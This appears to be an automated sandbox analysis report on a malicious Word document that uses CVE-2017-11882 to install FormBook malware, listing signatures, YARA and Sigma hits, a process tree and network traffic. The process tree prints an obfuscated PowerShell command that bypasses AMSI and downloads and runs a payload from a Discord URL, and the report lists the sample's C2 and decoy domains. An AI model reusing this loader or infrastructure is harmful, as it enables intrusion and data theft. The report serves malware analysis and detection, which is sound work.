Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report RFQ-CIF DT22.doc

Overview

General Information

Sample Name:RFQ-CIF DT22.doc
Analysis ID:532827
MD5:66c72e808d6803f22fcd6ec419a6f039
SHA1:0ac316f9fd8f6b3d8cfd05924f2c3704df112df7
SHA256:0c5704edd32b5754f2caf5a45caef11e0fa1a9381c84b05f391b9b8d1c101a3a
Tags:docFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document contains OLE streams which likely are hidden ActiveX objects
Sigma detected: Office product drops script at suspicious location
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Maps a DLL or memory area into another process
Sigma detected: Suspicious Script Execution From Temp Folder
Document contains OLE streams with names of living off the land binaries
Creates processes via WMI
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Tries to detect virtualization through RDTSC time measurements
Sigma detected: WScript or CScript Dropper
Sample uses process hollowing technique
Writes to foreign memory regions
Sigma detected: Microsoft Office Product Spawning Windows Shell
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Very long command line found
Microsoft Office drops suspicious files
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Found suspicious RTF objects
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Office Equation Editor has been started
Creates a window with clipboard capturing capabilities
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2704 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 668 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 2996 cmdline: CmD.exe /C cscript %tmp%\Client.vbs A C MD5: AD7B9C14083B52BC532FBA5948342B98)
      • cscript.exe (PID: 2700 cmdline: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C MD5: A3A35EE79C64A640152B3113E6E254E2)
  • powershell.exe (PID: 1344 cmdline: Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$91534784575270519153478457527051915347845752705191534784575270519153478457527051=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,57,49,53,51,52,55,56,52,53,55,53,50,55,48,53,49,48,57,47,57,49,53,55,57,57,50,48,54,48,55,50,48,52,53,53,55,56,47,109,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($91534784575270519153478457527051915347845752705191534784575270519153478457527051)|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • calc.exe (PID: 2008 cmdline: {path} MD5: 60B7C0FEAD45F2066E5B805A91F4F0FC)
      • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • cscript.exe (PID: 2816 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: A3A35EE79C64A640152B3113E6E254E2)
          • cmd.exe (PID: 2408 cmdline: /c del "C:\WINDOWS\syswow64\calc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cybocross.com/t1st/"], "decoy": ["metaplanck.com", "blackieriver.com", "roswitha-johns.com", "medstarthealth.info", "coin-master.site", "jadeshomes.com", "institutowholelife.com", "cobodoro.com", "redsoxfever.com", "mybestrent.com", "avinashweddingplanner.com", "gzjiakangyy.com", "irectoryofmedicalschools.com", "sidelutagu.biz", "myapoison.com", "356792.com", "waplosik.online", "saverinstitue.com", "derva.link", "dddream-mip.com", "sicilyholidayhouses.com", "nakedpornpics.xyz", "votersfirstmissouri.com", "rebeccadehl.com", "dinaautoricemill.com", "jjzv.quest", "scoutmasterhub.online", "ecommercians.com", "laoniuys151.xyz", "berufsausbilderverband.com", "moonlive.win", "prootro.com", "themetaversebible.com", "huolm.com", "builderindoncaster.com", "getbookedva.com", "freemockup.store", "leeyo.net", "monicas.xyz", "seferihisarveteriner.net", "appsee.net", "truesarang.com", "rosscreekranch.com", "anunturibaneasa.xyz", "yesmeehoo.com", "b2bsaassystems.com", "greatmumbaiescorts.com", "arthropace.com", "francesca-anselmi.com", "seattleselects.com", "fairtravel.online", "chopy.house", "hakaiyue.com", "liberarmoden.com", "sobledis.com", "masononeill.xyz", "metechrobot.com", "cneje0.ltd", "arvoreknowledgelearning.com", "milan-sites.com", "zoedebets.online", "lavyx.com", "answercode.xyz", "foodcartgps.net"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmprtf_cve2017_11882_oleAttempts to identify the exploit CVE 2017 11882John Davison
  • 0x3000:$headers: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00 C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03 0A
  • 0x3021:$font: 0A 01 08 5A 5A
  • 0x3052:$winexec: 12 0C 43 00
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmpEXP_potential_CVE_2017_11882unknownReversingLabs
  • 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
  • 0x2f00:$equation1: Equation Native
  • 0x920:$equation2: Microsoft Equation 3.0
  • 0x3029:$exe: .exe
  • 0x3052:$address: 12 0C 43 00

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      11.0.calc.exe.400000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        11.0.calc.exe.400000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        11.0.calc.exe.400000.2.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        11.0.calc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          11.0.calc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 668, ProcessCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ProcessId: 2996
          Sigma detected: Suspicious Script Execution From Temp FolderShow sources
          Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine|base64offset|contains: r+, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2996, ProcessCommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, ProcessId: 2700
          Sigma detected: WScript or CScript DropperShow sources
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine|base64offset|contains: r+, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2996, ProcessCommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, ProcessId: 2700
          Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 668, ProcessCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ProcessId: 2996

          Data Obfuscation:

          barindex
          Sigma detected: Office product drops script at suspicious locationShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2704, TargetFilename: C:\Users\user\AppData\Local\Temp\Client.vbs

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
          Found malware configurationShow sources
          Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cybocross.com/t1st/"], "decoy": ["metaplanck.com", "blackieriver.com", "roswitha-johns.com", "medstarthealth.info", "coin-master.site", "jadeshomes.com", "institutowholelife.com", "cobodoro.com", "redsoxfever.com", "mybestrent.com", "avinashweddingplanner.com", "gzjiakangyy.com", "irectoryofmedicalschools.com", "sidelutagu.biz", "myapoison.com", "356792.com", "waplosik.online", "saverinstitue.com", "derva.link", "dddream-mip.com", "sicilyholidayhouses.com", "nakedpornpics.xyz", "votersfirstmissouri.com", "rebeccadehl.com", "dinaautoricemill.com", "jjzv.quest", "scoutmasterhub.online", "ecommercians.com", "laoniuys151.xyz", "berufsausbilderverband.com", "moonlive.win", "prootro.com", "themetaversebible.com", "huolm.com", "builderindoncaster.com", "getbookedva.com", "freemockup.store", "leeyo.net", "monicas.xyz", "seferihisarveteriner.net", "appsee.net", "truesarang.com", "rosscreekranch.com", "anunturibaneasa.xyz", "yesmeehoo.com", "b2bsaassystems.com", "greatmumbaiescorts.com", "arthropace.com", "francesca-anselmi.com", "seattleselects.com", "fairtravel.online", "chopy.house", "hakaiyue.com", "liberarmoden.com", "sobledis.com", "masononeill.xyz", "metechrobot.com", "cneje0.ltd", "arvoreknowledgelearning.com", "milan-sites.com", "zoedebets.online", "lavyx.com", "answercode.xyz", "foodcartgps.net"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: RFQ-CIF DT22.docVirustotal: Detection: 25%Perma Link
          Source: RFQ-CIF DT22.docReversingLabs: Detection: 15%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY
          Source: 11.0.calc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.0.calc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.calc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.0.calc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Found potential equation exploit (CVE-2017-11882)Show sources
          Source: Static RTF information: Object: 1 Offset: 0001CF7Bh
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drStream path '_1699974672/\x1CompObj' : ...........................F....Microsoft Equation
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: Binary string: wntdll.pdb source: calc.exe, calc.exe, 0000000B.00000003.488729930.00000000007C0000.00000004.00000001.sdmp, calc.exe, 0000000B.00000002.542590602.0000000000CB0000.00000040.00000001.sdmp, calc.exe, 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, calc.exe, 0000000B.00000003.487607468.0000000000660000.00000004.00000001.sdmp, cscript.exe
          Source: Binary string: cscript.pdbN source: calc.exe, 0000000B.00000002.541582055.0000000000584000.00000004.00000020.sdmp, calc.exe, 0000000B.00000002.541504670.0000000000430000.00000040.00020000.sdmp
          Source: Binary string: cscript.pdb source: calc.exe, 0000000B.00000002.541582055.0000000000584000.00000004.00000020.sdmp, calc.exe, 0000000B.00000002.541504670.0000000000430000.00000040.00020000.sdmp, cscript.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B8F0D3 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,13_2_00B8F0D3

          Software Vulnerabilities:

          barindex
          Document exploit detected (creates forbidden files)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.vbsJump to behavior
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.159.135.233:443
          Source: global trafficDNS query: name: google.com
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then sub dword ptr [esp+04h], 0Ch13_2_00B85AD1
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.159.135.233:443

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 47.241.96.113 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.foodcartgps.net
          Source: C:\Windows\explorer.exeDomain query: www.milan-sites.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.cybocross.com/t1st/
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: global trafficHTTP traffic detected: GET /t1st/?axoXKTD=uTpqzRmP4oAoFu5bW/C1NBvei3ZEHQ9lndq23HdAXkDs/tJRE4xymzeaNit+87gYgYiprQ==&bx=7nL09FJ HTTP/1.1Host: www.milan-sites.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /attachments/915347845752705109/915799206072045578/m.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
